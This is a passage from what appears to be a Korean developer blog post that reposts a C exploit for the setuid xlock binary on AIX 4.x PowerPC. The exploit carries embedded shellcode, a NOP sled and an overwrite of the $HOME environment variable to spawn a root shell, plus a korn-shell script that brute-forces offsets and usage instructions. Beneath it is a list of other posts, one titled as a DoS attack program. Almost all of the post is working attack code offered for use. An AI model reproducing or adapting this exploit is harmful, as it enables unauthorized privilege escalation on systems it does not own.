[c] home env stack overflow

* /usr/bin/X11/xlock exploit (kinda' coded) by BeastMaster V

* CREDITS: this code is simply a modified version of an exploit

* posted by Georgi Guninski (guninski@hotmail.com)

* This will give a #rootshell# by overwriting a buffer

* via the $HOME environment variable in 'xlock'

* This exploit is designed for AIX 4.x on PPC platform.

* USAGE:

* $ cc -o foo -g aix_xlock.c

* $ ./foo 3200

* #

* HINT: Try giving ranges from 3100 through 3400

* (If these ranges don't work, then run the brute

* korn shell script provided after the exploit)

* DISCLAIMER: use this program in a responsible manner.

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

extern int execv();

#define MAXBUF 600

unsigned int code[]={

0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,

0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,

0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,

0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,

0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,

0x7c0903a6 , 0x4e800420, 0x0

};

char *createvar(char *name,char *value)

{

char *c;

int l;

l=strlen(name)+strlen(value)+4;

if (! (c=malloc(l)))

{

perror("error allocating");

exit(2);

};

strcpy(c,name);

strcat(c,"=");

strcat(c,value);

putenv(c);

return c;

}

main(int argc,char **argv,char **env)

{

unsigned int buf[MAXBUF],frame[MAXBUF],i,nop,toc,eco,*pt;

int min=200, max=300;

unsigned int return_address;

char *newenv[8];

char *args[4];

int offset=3200;

if (argc==2) offset = atoi(argv[1]);

pt=(unsigned *) &execv;

toc=*(pt+1);

eco=*pt;

*((unsigned short *)code+9)=(unsigned short) (toc & 0x0000ffff);

*((unsigned short *)code+7)=(unsigned short) ((toc >> 16) & 0x0000ffff);

*((unsigned short *)code+15)=(unsigned short) (eco & 0x0000ffff);

*((unsigned short *)code+13)=(unsigned short) ((eco >> 16) & 0x0000ffff);

return_address=(unsigned)&buf[0]+offset;

for(nop=0;nop<min;nop++) buf[nop]=0x4ffffb82;

strcpy((char*)&buf[nop],(char*)&code);

i=nop+strlen( (char*) &code)/4-1;

for(i=0;i<max-1;i++) frame[i]=return_address;

frame[i]=0;

newenv[0]=createvar("EGGSHEL",(char*)&buf[0]);

newenv[1]=createvar("EGGSHE2",(char*)&buf[0]);

newenv[2]=createvar("EGGSHE3",(char*)&buf[0]);

newenv[3]=createvar("EGGSHE4",(char*)&buf[0]);

newenv[4]=createvar("DISPLAY",getenv("DISPLAY"));

newenv[5]=createvar("HOME",(char*)&frame[0]);

args[0]="xlock";

execve("/usr/bin/X11/xlock",args,newenv);

perror("Error executing execve n");

}

----------- Brute Korn Shell Script -----------

#!/bin/ksh

L=3000

O=10

while [ $L -lt 12000 ]

echo $L

L=`expr $L + $O`

./foo $L

done

----------- End Brute Shell Script ------------

/* http://www.hack.co.za ; [2000]*/

List of Articles
번호	분류	제목	글쓴이	날짜	조회 수
873	Develop	[c] 도메인(호스트)으로 IP정보 알아오기.. (nslookup과 비슷)	hooni	2013.04.23	8553
872	Develop	[c] 도스 공격(DoS Attack) 프로그램	hooni	2013.04.23	12362
871	Develop	[c] 디피-헬만 키교환(Diffie–Hellman key exchange) 샘플 코드.. ㅋㄷ	hooni	2013.04.23	10127
870	Develop	[c] 라인수 입력받아 마름모꼴 출력하기..	hooni	2003.04.23	8164
869	Develop	[c] 레포트용으로 제출했던 여러 소스코드 모음	hooni	2003.04.23	9726
868	Develop	[c] 로또(Lotto) 번호 생성기	hooni	2013.04.23	8279
867	Develop	[c] 마우스 따라다니는 고양이 - 네코95 (WinAPI)	hooni	2013.04.23	9432
866	Develop	[c] 맵서치인 듯(옛날 컴에서 찾은 자료)	hooni	2013.04.23	8560
865	Develop	[c] 메세지 프로그램 (Server - Agent - Client)	hooni	2013.04.23	7910
864	Develop	[c] 메시지큐(Message Queue) 설명.. (joinc)	hooni	2013.04.23	16989
863	Develop	[c] 무선 Radius Server 자료..	hooni	2013.04.23	8566
862	Develop	[c] 문자열 str_shift 예제..	hooni	2013.04.23	8589
861	Develop	[c] 문자열 뒤집기 (문자열 거꾸로 출력하는 간단소스)	hooni	2003.04.23	11490
860	Develop	[c] 문자열 뒤집기 초간단 샘플 코드 ㅎㅎ	hooni	2013.04.23	8446
859	Develop	[c] 문자열 라이브러리 최신버전	hooni	2003.04.23	8247
858	Develop	[c] 문자열 자르는 함수(strtok) 예제	hooni	2013.04.23	13502

분류

글쓴이

873

Develop

[c] 도메인(호스트)으로 IP정보 알아오기.. (nslookup과 비슷) file